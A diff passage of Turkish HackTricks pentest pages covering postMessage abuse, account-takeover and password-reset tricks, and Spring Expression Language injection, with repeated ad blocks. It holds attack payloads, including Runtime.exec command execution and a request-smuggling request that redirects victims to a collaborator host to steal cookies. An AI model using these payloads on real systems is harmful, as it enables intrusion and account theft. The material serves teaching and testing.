Mesajın, betiğin dinlediği pencereden geldiğini kontrol etmek mümkündür (özellikle **Tarayıcı uzantılarından İçerik Betikleri** için ilginçtir, mesajın aynı sayfadan mı gönderildiğini kontrol etmek için):
|
||||
```javascript
|
||||
// If it’s not, return immediately.
|
||||
if( received_message.source !== window ) {
|
||||
return;
|
||||
}
|
||||
```
|
||||
**`e.source`**'un bir mesajın **iframe** oluşturarak **null** olmasını sağlayabilirsiniz ve **hemen silinir**.
|
||||
**`e.source`**'un bir mesajın **iframe** oluşturarak **zorla null** olmasını sağlayabilirsiniz ve **hemen silinir**.
|
||||
|
||||
Daha fazla bilgi için **okuyun:**
|
||||
|
||||
|
@ -184,7 +184,7 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
|
|||
```
|
||||
### Ana sayfayı engelleyerek çocuğa gönderilen mesajı çalmak
|
||||
|
||||
Aşağıdaki sayfada, **ana sayfayı engelleyerek** verileri göndermeden önce **ana sayfayı engelleyerek** ve **çocuk iframe'indeki XSS'i** kötüye kullanarak **alınan hassas postmessage verilerini** nasıl çalabileceğinizi görebilirsiniz:
|
||||
Aşağıdaki sayfada, **duyarlı postmessage verilerini** **çalan** ve verileri göndermeden önce **ana** sayfayı **engelleyen** ve verilerin alınmadan önce bir **XSS** kullanarak **sızdıran** bir **çocuk iframe'ına** gönderilen **mesajı** nasıl çalabileceğinizi görebilirsiniz:
|
||||
|
||||
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
|
||||
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
|
||||
|
@ -192,19 +192,19 @@ Aşağıdaki sayfada, **ana sayfayı engelleyerek** verileri göndermeden önce
|
|||
|
||||
### Iframe konumunu değiştirerek mesaj çalmak
|
||||
|
||||
Eğer X-Frame-Header olmadan bir iframe içerebilecek bir web sayfasını iframe'leyebilirseniz ve bu iframe başka bir iframe içeriyorsa, o çocuk iframe'inin konumunu değiştirebilirsiniz, böylece bir saldırgan, iframe'in **kökenini** kendi tarafından **kontrol edilen** bir sayfaya **değiştirerek** postmessage ile gönderilen bir mesajı **çalabilir**:
|
||||
Eğer X-Frame-Header olmadan bir iframe içeren bir web sayfasını iframe'leyebilirseniz, o çocuk iframe'ının konumunu değiştirebilirsiniz, böylece bir **joker** kullanarak gönderilen bir **postmessage** alıyorsa, bir saldırgan o iframe'ın **kökenini** kendi tarafından **kontrol edilen** bir sayfaya **değiştirebilir** ve mesajı **çalabilir**:
|
||||
|
||||
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
|
||||
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
### postMessage ile Prototype Pollution ve/veya XSS çalmak
|
||||
### postMessage ile Prototype Pollution ve/veya XSS
|
||||
|
||||
`postMessage` aracılığıyla gönderilen verilerin JS tarafından yürütüldüğü senaryolarda, **sayfayı iframe'leyebilir** ve **prototype pollution/XSS**'yi kötüye kullanarak **exploit** edebilirsiniz.
|
||||
`postMessage` aracılığıyla gönderilen verilerin JS tarafından yürütüldüğü senaryolarda, **sayfayı iframe'leyebilir** ve **prototype pollution/XSS**'yi **sömürebilir** ve saldırıyı `postMessage` aracılığıyla göndererek **çözebilirsiniz**.
|
||||
|
||||
`postMessage` aracılığıyla **çok iyi açıklanan XSS örnekleri** [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) adresinde bulunabilir.
|
||||
Birkaç **çok iyi açıklanan XSS** örneği, [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html) adresinde bulunabilir.
|
||||
|
||||
Bir `iframe`'e **Prototype Pollution ve ardından XSS**'yi kötüye kullanmak için bir `postMessage` ile kötüye kullanım örneği:
|
||||
Bir `iframe`'a **Prototype Pollution ve ardından XSS**'yi **sömüren** bir saldırı örneği:
|
||||
```html
|
||||
<html>
|
||||
<body>
|
||||
|
@ -222,9 +222,9 @@ setTimeout(get_code, 2000);
|
|||
```
|
||||
**Daha fazla bilgi için**:
|
||||
|
||||
* [**prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/) hakkında sayfaya bağlantı
|
||||
* [**Prototype pollution**](../deserialization/nodejs-proto-prototype-pollution/) hakkında sayfaya bağlantı
|
||||
* [**XSS**](../xss-cross-site-scripting/) hakkında sayfaya bağlantı
|
||||
* [**client side prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) hakkında sayfaya bağlantı
|
||||
* [**İstemci tarafı prototype pollution to XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) hakkında sayfaya bağlantı
|
||||
|
||||
## Referanslar
|
||||
|
||||
|
@ -232,9 +232,9 @@ setTimeout(get_code, 2000);
|
|||
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
|
||||
* Pratik yapmak için: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunan **karanlık ağ** destekli bir arama motorudur.
|
||||
|
||||
|
@ -250,10 +250,10 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) katılın veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek paylaşın.
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,25 +2,25 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'da **takip edin**.
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**] (https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [Discord grubuna katılın](https://discord.gg/hRep4RUj7f)** veya [telegram grubuna katılın](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)'i takip edin.
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -36,7 +36,7 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
* E-postayı değiştirerek kontrol edin:
|
||||
* büyük harf
|
||||
* \+1@
|
||||
* e-postada birkaç nokta ekleyin
|
||||
* e-postada nokta ekleyin
|
||||
* e-posta adında özel karakterler (%00, %09, %20)
|
||||
* E-postadan sonra siyah karakterler ekleyin: `test@test.com a`
|
||||
* victim@gmail.com@attacker.com
|
||||
|
@ -48,12 +48,12 @@ Bir kullanıcı adının uygulama içinde zaten kaydedilip kaydedilmediğini anl
|
|||
|
||||
### Şifre Politikası
|
||||
|
||||
Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanılıp kullanılamayacağını kontrol edin).\
|
||||
Kullanıcı oluştururken şifre politikasını kontrol edin (zayıf şifreler kullanıp kullanamayacağınızı kontrol edin).\
|
||||
Bu durumda kimlik bilgilerini brute force deneyebilirsiniz.
|
||||
|
||||
### SQL Enjeksiyonu
|
||||
|
||||
Hesap ele geçirmelerini denemek veya kayıt formlarından bilgi çekmek için **SQL Enjeksiyonları** yapmak için [**bu sayfayı kontrol edin**](sql-injection/#insert-statement).
|
||||
[**Bu sayfayı kontrol edin**](sql-injection/#insert-statement) ve kayıt formlarında **SQL Enjeksiyonları** aracılığıyla hesap ele geçirmeyi veya bilgi çıkarmayı denemeyi öğrenin.
|
||||
|
||||
### Oauth Ele Geçirmeleri
|
||||
|
||||
|
@ -75,17 +75,17 @@ Kayıt olduktan sonra e-postayı değiştirmeyi deneyin ve bu değişikliğin do
|
|||
|
||||
* **Tek kullanımlık e-postaları** kullanıp kullanamayacağınızı kontrol edin
|
||||
* **Uzun** **şifre** (>200) **DoS**'a neden olur
|
||||
* Hesap oluştururken **hız sınırlarını kontrol edin**
|
||||
* Hesap oluşturma üzerindeki **hız sınırlarını** kontrol edin
|
||||
* username@**burp\_collab**.net kullanın ve **geri çağrıyı** analiz edin
|
||||
|
||||
## **Şifre Sıfırlama Ele Geçirmesi**
|
||||
## **Şifre Sıfırlama Ele Geçirmeleri**
|
||||
|
||||
### Referans Aracılığıyla Şifre Sıfırlama Jetonu Sızıntısı <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>
|
||||
|
||||
1. E-posta adresinize şifre sıfırlama isteği gönderin
|
||||
2. Şifre sıfırlama bağlantısına tıklayın
|
||||
3. Şifreyi değiştirmeyin
|
||||
4. Herhangi bir 3. taraf web sitesine (örneğin: Facebook, twitter) tıklayın
|
||||
4. Herhangi bir 3. taraf web sitesine tıklayın (örneğin: Facebook, twitter)
|
||||
5. Burp Suite proxy'de isteği onaylayın
|
||||
6. Referer başlığının şifre sıfırlama jetonunu sızdırıp sızdırmadığını kontrol edin.
|
||||
|
||||
|
@ -137,7 +137,7 @@ Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığın
|
|||
* Jeton yeniden kullanımı
|
||||
* Jetonun son kullanma tarihi
|
||||
|
||||
### Sızan Şifre Sıfırlama Jetonu <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
### Şifre Sıfırlama Jetonunun Sızdırılması <a href="#leaking-password-reset-token" id="leaking-password-reset-token"></a>
|
||||
|
||||
1. Belirli bir e-posta için API/UI kullanarak şifre sıfırlama isteği tetikleyin, örneğin: test@mail.com
|
||||
2. Sunucu yanıtını inceleyin ve `resetToken` için kontrol edin
|
||||
|
@ -145,8 +145,8 @@ Jetonun süresinin dolup dolmadığını veya her zaman aynı olup olmadığın
|
|||
|
||||
### Kullanıcı Adı Çakışması Yoluyla Şifre Sıfırlama <a href="#password-reset-via-username-collision" id="password-reset-via-username-collision"></a>
|
||||
|
||||
1. Kurbanın kullanıcı adına, ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş aynı olan bir kullanıcı adıyla sistemde kaydolun, örneğin: `"admin "`
|
||||
2. Kötü niyetli kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
|
||||
1. Kurbanın kullanıcı adıyla aynı olan ancak kullanıcı adının önüne ve/veya arkasına boşluklar eklenmiş bir kullanıcı adıyla sistemde kayıt olun, örneğin: `"admin "`
|
||||
2. Zararlı kullanıcı adınızla bir şifre sıfırlama isteği isteyin.
|
||||
3. E-postanıza gönderilen jetonu kullanın ve kurbanın şifresini sıfırlayın.
|
||||
4. Yeni şifre ile kurban hesabına bağlanın.
|
||||
|
||||
|
@ -155,13 +155,13 @@ Bkz: [CVE-2020-7245](https://nvd.nist.gov/vuln/detail/CVE-2020-7245)
|
|||
|
||||
### XSS Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-cross-site-scripting" id="account-takeover-via-cross-site-scripting"></a>
|
||||
|
||||
1. Uygulama içinde veya çerezler üst etki alanına sahipse alt etki alanında bir XSS bulun: `*.domain.com`
|
||||
1. Uygulama içinde veya çerezlerin üst alan etki alanına (`*.domain.com`) kapsandığı bir alt alan içinde XSS bulun.
|
||||
2. Mevcut **oturum çerezini** sızdırın
|
||||
3. Çerez kullanarak kullanıcı olarak kimlik doğrulayın
|
||||
|
||||
### HTTP İstek Kaçırma Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-http-request-smuggling" id="account-takeover-via-http-request-smuggling"></a>
|
||||
|
||||
1\. Türüne göre HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için **smuggler** kullanın\
|
||||
1\. Türde HTTP İstek Kaçırma (CL, TE, CL.TE) tespit etmek için **smuggler**'ı kullanın\
|
||||
`powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h`\
|
||||
2\. `POST / HTTP/1.1`'i aşağıdaki verilerle üzerine yazacak bir istek oluşturun:\
|
||||
`GET http://something.burpcollaborator.net HTTP/1.1 X:` hedef, kurbanları burpcollab'a yönlendirmek ve çerezlerini çalmaktır\
|
||||
|
@ -177,7 +177,7 @@ Content-Length: 83
|
|||
GET http://something.burpcollaborator.net HTTP/1.1
|
||||
X: X
|
||||
```
|
||||
### CSRF Aracılığıyla Hesap Ele Geçirme <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
### Hesap Ele Geçirme CSRF Aracılığıyla <a href="#account-takeover-via-csrf" id="account-takeover-via-csrf"></a>
|
||||
|
||||
1. CSRF için bir payload oluşturun, örn: "Şifre değişikliği için otomatik gönderimli HTML formu"
|
||||
2. Payload'u gönderin
|
||||
|
@ -198,9 +198,9 @@ JSON Web Token, bir kullanıcıyı doğrulamak için kullanılabilir.
|
|||
* [https://salmonsec.com/cheatsheet/account\_takeover](https://salmonsec.com/cheatsheet/account\_takeover)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevsellikler sunar.
|
||||
|
||||
|
@ -213,14 +213,14 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan Kahraman'a AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* [**The PEASS Family**](https://opensea.io.peass) koleksiyonumuzdaki özel [**NFT'leri**](https://opensea.io/collection/the-peass-family) keşfedin
|
||||
* **💬 [Discord grubuna](https://discord.gg/hRep4RUj7f) veya [telegram grubuna](https://t.me/peass) katılın veya** Twitter'da 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,21 +2,21 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahramana AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>AWS hacklemeyi sıfırdan kahramana öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
|
||||
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin **HackTricks'te reklamını görmek ister misiniz**? Ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Bir siber güvenlik şirketinde mi çalışıyorsunuz? Şirketinizin **HackTricks'te reklamını görmek ister misiniz**? ya da **PEASS'ın en son sürümüne erişmek veya HackTricks'i PDF olarak indirmek ister misiniz**? [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* **💬** [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya beni **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)** takip edin**.
|
||||
* **Hacking püf noktalarınızı göndererek PR'ler aracılığıyla** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **ile paylaşın**.
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* **Katılın** [**💬**](https://emojipedia.org/speech-balloon/) **Discord grubuna**](https://discord.gg/hRep4RUj7f) veya **telegram grubuna** veya **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**'u takip edin**.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks repo**](https://github.com/carlospolop/hacktricks) **ve** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **üzerinden PR gönderin**.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini kontrol etmek için ücretsiz** işlevsellikler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar tarafından tehlikeye atılıp atılmadığını kontrol etmek için ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
|
@ -32,17 +32,17 @@ Expression Language (EL), sunum katmanı (örneğin, web sayfaları) ile uygulam
|
|||
|
||||
- **JavaServer Faces (JSF)**: Arayüz bileşenlerini arka uç veri/aksiyonlarına bağlamak için.
|
||||
- **JavaServer Pages (JSP)**: JSP sayfaları içinde veri erişimi ve manipülasyonu için.
|
||||
- **Contexts and Dependency Injection for Java EE (CDI)**: Web katmanının yönetilen bean'lerle etkileşimini kolaylaştırmak için.
|
||||
- **Java EE için Bağlam ve Bağımlılık Enjeksiyonu (CDI)**: Web katmanının yönetilen bean'lerle etkileşimini kolaylaştırmak için.
|
||||
|
||||
**Kullanım Bağlamları**:
|
||||
|
||||
- **Spring Framework**: Güvenlik ve Veri gibi çeşitli modüllerde uygulanır.
|
||||
- **Genel Kullanım**: Java, Kotlin ve Scala gibi JVM tabanlı dillerde geliştiriciler tarafından SpEL API aracılığıyla.
|
||||
|
||||
EL, JavaEE teknolojilerinde, bağımsız ortamlarda mevcuttur ve `.jsp` veya `.jsf` dosya uzantıları, yığın hataları ve başlıklarda "Servlet" gibi terimlerle tanınabilir. Ancak, özellikleri ve belirli karakterlerin kullanımı sürüm bağımlı olabilir.
|
||||
EL, JavaEE teknolojilerinde, bağımsız ortamlarda mevcuttur ve `.jsp` veya `.jsf` dosya uzantıları, yığın hataları ve başlıklarda "Servlet" gibi terimlerle tanınabilir. Ancak özellikleri ve belirli karakterlerin kullanımı sürüm bağımlı olabilir.
|
||||
|
||||
{% hint style="info" %}
|
||||
**EL sürümüne** bağlı olarak bazı **özelliklerin** **Açık** veya **Kapalı** olabileceği ve genellikle bazı **karakterlerin** **yasaklanabileceği** unutulmamalıdır.
|
||||
**EL sürümüne** bağlı olarak bazı **özelliklerin** **Açık** veya **Kapalı** olabileceği ve genellikle bazı **karakterlerin** **yasaklanmış** olabileceği unutulmamalıdır.
|
||||
{% endhint %}
|
||||
|
||||
## Temel Örnek
|
||||
|
@ -77,7 +77,7 @@ System.out.println(result);
|
|||
}
|
||||
}
|
||||
```
|
||||
Sonraki adım, kodu derlemektir (eğer `javac` yüklü değilse, `sudo apt install default-jdk` komutunu kullanarak yükleyin):
|
||||
Sonra kodu derleyin (eğer `javac` yüklü değilse, `sudo apt install default-jdk` komutunu kullanarak yükleyin):
|
||||
```java
|
||||
javac -cp commons-lang3-3.9.jar:spring-core-5.2.1.RELEASE.jar:spring-expression-5.2.1.RELEASE.jar:commons-lang3-3.9.jar:commons-logging-1.2.jar:. Main.java
|
||||
```
|
||||
|
@ -88,7 +88,7 @@ Enter a String to evaluate:
|
|||
{5*5}
|
||||
[25]
|
||||
```
|
||||
Not alın ki önceki örnekte `{5*5}` terimi **değerlendirildi**.
|
||||
Not: Önceki örnekte `{5*5}` terimi **değerlendirildi**.
|
||||
|
||||
## **CVE Tabanlı Öğretici**
|
||||
|
||||
|
@ -207,7 +207,7 @@ T(java.lang.Runtime).getRuntime().exec('ping my-domain.com')
|
|||
T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec("cmd /c dir").getInputStream())
|
||||
''.class.forName('java.lang.Runtime').getRuntime().exec('calc.exe')
|
||||
```
|
||||
### Ortamı incelemek
|
||||
### Ortamı İnceleme
|
||||
|
||||
* `applicationScope` - global uygulama değişkenleri
|
||||
* `requestScope` - istek değişkenleri
|
||||
|
@ -231,7 +231,7 @@ ${employee.FirstName}
|
|||
```
|
||||
## WAF Atlatma
|
||||
|
||||
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/) adresini kontrol edin.
|
||||
[https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/](https://h1pmnh.github.io/post/writeup\_spring\_el\_waf\_bypass/) adresine bakın
|
||||
|
||||
## Referanslar
|
||||
|
||||
|
@ -240,13 +240,13 @@ ${employee.FirstName}
|
|||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#tools)
|
||||
* [https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt](https://github.com/marcin33/hacking/blob/master/payloads/spel-injections.txt)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -256,10 +256,10 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
